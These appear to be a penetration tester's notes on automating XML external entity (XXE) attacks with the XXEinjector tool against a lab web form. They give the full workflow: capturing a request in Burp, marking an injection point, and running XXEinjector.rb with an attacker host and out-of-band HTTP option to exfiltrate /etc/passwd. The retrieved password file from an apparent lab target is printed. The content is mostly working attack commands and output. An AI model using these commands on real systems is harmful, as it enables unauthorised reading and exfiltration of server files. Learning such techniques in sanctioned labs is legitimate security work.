XXEINJECTOR (AUTOMATED)
Last updated
Last updated
this tool automates a lot of XXE injections including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
#Installation
root@oco:~$ git clone https://github.com/enjoiz/XXEinjector.git#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: ...
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.73.189
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.73.189
Referer: http://10.129.73.189/blind/
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>testName</name>
<tel>1234567890</tel>
<email>testName@null.com</email>
<message>test msg</message>
</root>#copy the HTTP request from Burp and write it to a file for the tool to use
root@oco:~$ nano xxe.req
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.201.94
Referer: http://10.129.201.94/blind/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
* DO NOT include the full XML data, only the first line, and write
XXEINJECT after it as a position locator for the toolroot@oco:~$ cd XXEInjector
root@oco:~$ ruby XXEinjector.rb --host={attackerIP} --httpport={attackerPort} --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
[+] Nothing else to do. Exiting.
root@oco:~$ ls
Logs README.md XXEinjector.rb xxe.req
root@oco:~$ ls -R Logs/
Logs/:
10.129.82.212
Logs/10.129.82.212:
etc
Logs/10.129.82.212/etc:
passwd.log
* all exfiltrated files get stored in the Logs folder under the tool
root@oco:~$ cat Logs/10.129.82.212/etc/passwd.log
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
xxe:x:1000:1000:xxe:/home/xxe:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false